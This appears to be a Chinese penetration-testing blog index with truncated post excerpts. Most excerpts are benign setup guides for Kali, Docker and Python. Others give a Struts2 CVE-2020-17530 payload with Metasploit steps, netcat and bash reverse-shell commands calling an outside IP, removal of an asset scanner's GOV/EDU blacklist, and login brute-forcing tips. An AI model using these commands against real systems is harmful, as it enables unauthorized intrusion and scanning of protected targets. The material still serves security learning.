Maodou

Struts2框架S2-061(S2-062)命令执行 CVE-2020-17530利用条件&作用利用条件: Apache Struts 2.0.0 - 2.5.29 作用：命令执行 利用方法传参处检测Payload 12?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d 检测脚本 使用方法：python struts2-s2-061.py [url] struts2-s2-061.zip 利用方法(Kali) 1234567891011121314msfconsolesearch strutsuse exploit/multi/http/struts2_multi_eval_ognlset RHOSTS IPset SRVHOST IPrun成功后输入shell即可执行命令 Spring框架Spring Web Flow框架远程代码执行（CVE-2017-4971）利用条件&作用影响版本：Spring WebFlow 2.4.0 -...

这篇我来教大家如何进行调大字体 一、图标大小桌面【右键】选择【桌面设置】打开设置界面 调节到适合自己的大小即可（我调的是72) 二、菜单栏大小在菜单栏空白处【右键】—选择【面板】—【面板首选项】打开面板后选择【显示】—【尺寸】—调节【行大小】 我调的是55，大家可以根据自己的习惯来调大小 三、终端字体最常用的就是命令行了，默认字体也是真的小。打开【终端】—【文件】—打开设置界面，【界面设置】—调节【字体】大小 四、系统字体这个地方设置了之后可以修改掉大部分的kali系统字体点击kali左上角的【应用程序】—右下角【设置管理】 五、标题字体同样是【应用程序】—【设置】—【窗口管理器】 打开设置界面—【样式】—【标题字体】这个标题是所有的标题，包括终端的标题、设置界面的标题、工具的标题… 整体完成的效果：通过以上步骤，你可以轻松地在Kali Linux中设置中文界面并调大字体。祝你使用愉快！

使用Kali过程中可能会遇到安装时选错语言或者是使用Kali官方的虚拟机镜像会导致卡里为英文那本教程来教会你如何调成中文 1、首先我们切换成root用户 su root 2、然后输入软件包进行配置 1sudo dpkg-reconfigure locales 回车后会看到在弹出的界面中，（我这个界面一直往下拉可以参考我这个界面它是在最底下原因是abcd来排的所以这一次后面要翻到最底下）使用方向键选择“zh_CN.UTF-8 UTF-8“，然后按下回车键进行确认。 然后我们选择zh_CN这个再点击确认（要用tab键点击那个ok才算可以） 我们重新启动一下我们的kali机就可以了以上就是kali机的改为中文版的方法

拉取项目首先从GitHub克隆到服务器上。 1git clone https://github.com/ki9mu/ARL-plus-docker/ 修改配置文件因为ARL在配置文件里设置了黑名单，有时候项目为GOV或者EDU之类的时候无法进行扫描，所以在这里修改一下配置文件就可以解除限制。 12cd ARL-plus-docker/vi config-docker.yaml 在这里删掉黑名单里的几项就可以了 修改后： 增加和修改riskiq以及fofa API 再增强版里添加了Oneforall的模块，所以在配置文件里需要打开，因为clone下来的代码里默认是Flase，这里将需要想打开的开关替换为Ttue即可。 vi oneforall-config/setting.py 修改后： 修改为配置文件之后就开始启动docker，先添加一个volume，然后docker-compose up -d就可以直接启动，拉取镜像的时候如果很慢可以换一下docker源。 12docker volume create...

在 Linux环境下安装 Docker最新教程很多小伙伴每次会遇到docker安装不起来，不是缺证书就是缺密钥，前段时间我自己开docker也开不起来，我找来找去不知道原因在哪里，一会说源有问题，一会说证书有问题，我真服了。然后这两天刚好要写毕业论文了，又需要docker了，我就重新安装一遍。发现很简单，只需要三条命令就行了，我的Linux版本是debian12.0的，centos或者乌班图的可以看官方文档，这篇我介绍我怎么安装的。看我有截图的部分即可！！！！ 1、使用存储库安装apt！！！！！！（这是第一条命令）在这之前一定要先更新！！！sudo apt upgrade： #更新已安装的软件包在新主机上首次安装 Docker Engine 之前，您需要 需要设置 Docker 存储库。之后，您可以安装和更新 存储库中的 Docker。<font style="color:rgb(0, 0, 0);background-color:rgb(225, 226, 230);">apt</font> 设置 Docker...

步骤简记信息收集 使用Oneforall收集子域名，将获取到的子域名放到txt中 使用nuclei批量扫描URL，扫描信息 先对目标IP进行扫描端口，然后对端口进行记录渗透 使用目录扫描工具，对目标站点进行扫描 如果是登录口，爆破一下账号密码 用FindSomething看一下JS，有没有泄露 使用漏洞检测工具，对目标站点进行扫描。例如xray与bp联动，进行被动扫描，nuclei | afrog进行漏洞扫描 漏洞发现思路验证绕过备注：将Burp拦截的请求包发送后拦截响应包 先在代理页面拦截请求包，点击操作-拦截-拦截该请求的响应包 适用的地方：验证码....... 对返回数据包进行修改，然后发送。例如:...

假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统，ip为：192.168.0.4，开放4444端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shellubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令，然后kali上再进行nc监听，即可反弹shell。 需要目标机安装nc。 反向反弹shell方法1：bash反弹bash -i >& /dev/tcp/122.228.26.226/27317 0>&1 但首先需要在kali上使用nc监听端口： nc -lvp 7777 此方法在ubuntu下不会反弹成功，CentOS可以反弹成功。 方法2：python反弹反弹shell的命令如下： 1python -c "import...

渗透神器Kali Linux系统的安装教程镜像下载 镜像链接：【操作系统】Kali Linux v2023.4 官方版 - 极核GetShell (get-shell.com) 其他镜像链接：（按需下载）： 在这里我选择的清华源，点击直链下载后面的链接进行下载。需要其他镜像文件的可以前往官网地址或者其他源镜站进行下载。 安装kali 1.打开Vmware首页，创建新的虚拟机。（Vmware直接去官网下载即可） 2.在这里，我们选择简单一点的安装方式-典型安装 3.选择...

linux怎么安装Python环境 在Linux上安装特定版本的Python（如Python 3.9.6）通常涉及从源代码编译安装或使用第三方仓库（如Deadsnakes PPA对于Ubuntu/Debian系统）。以下是在Linux上安装Python 3.9.6的几种方法： 方法1：从源代码编译安装下载Python源代码 访问Python官方网站下载页面（https://www.python.org/downloads/source/），找到Python 3.9.6的源代码包（通常是.tar.xz格式），然后使用wget或curl命令下载。 1wget https://www.python.org/ftp/python/3.9.6/Python-3.9.6.tar.xz 解压源代码包 12tar xvf Python-3.9.6.tar.xz cd Python-3.9.6 安装依赖 根据您的Linux发行版安装必要的编译依赖。对于Debian/Ubuntu系统，可以使用以下命令： 12sudo apt update sudo apt...

开关机 sync ：把内存中的数据写到磁盘中（关机、重启前都需先执行sync） shutdown -r now或reboot ：立刻重启 shutdown -h now ：立刻关机 shutdown -h 20:00 ：预定时间关闭系统（晚上8点关机，如果现在超过8点，则明晚8点） shutdown -h +10 ：预定时间关闭系统（10分钟后关机） shutdown -c ：取消按预定时间关闭系统 系统信息 who am i ：查看当前使用的终端 who 或 w ： 查看所有终端 uname -m ：显示机器的处理器架构（如x86_64） cat /proc/version ：查看linux版本信息 uname -r ：显示正在使用的内核版本 lsb_release -a ：查看系统发行版本（如CentOS7）（没这个命令先安装yum install -y redhat-lsb-core）（这个命令适用于所有的Linux发行版，包括Redhat、SuSE、Debian…等发行版） cat /etc/redhat-release...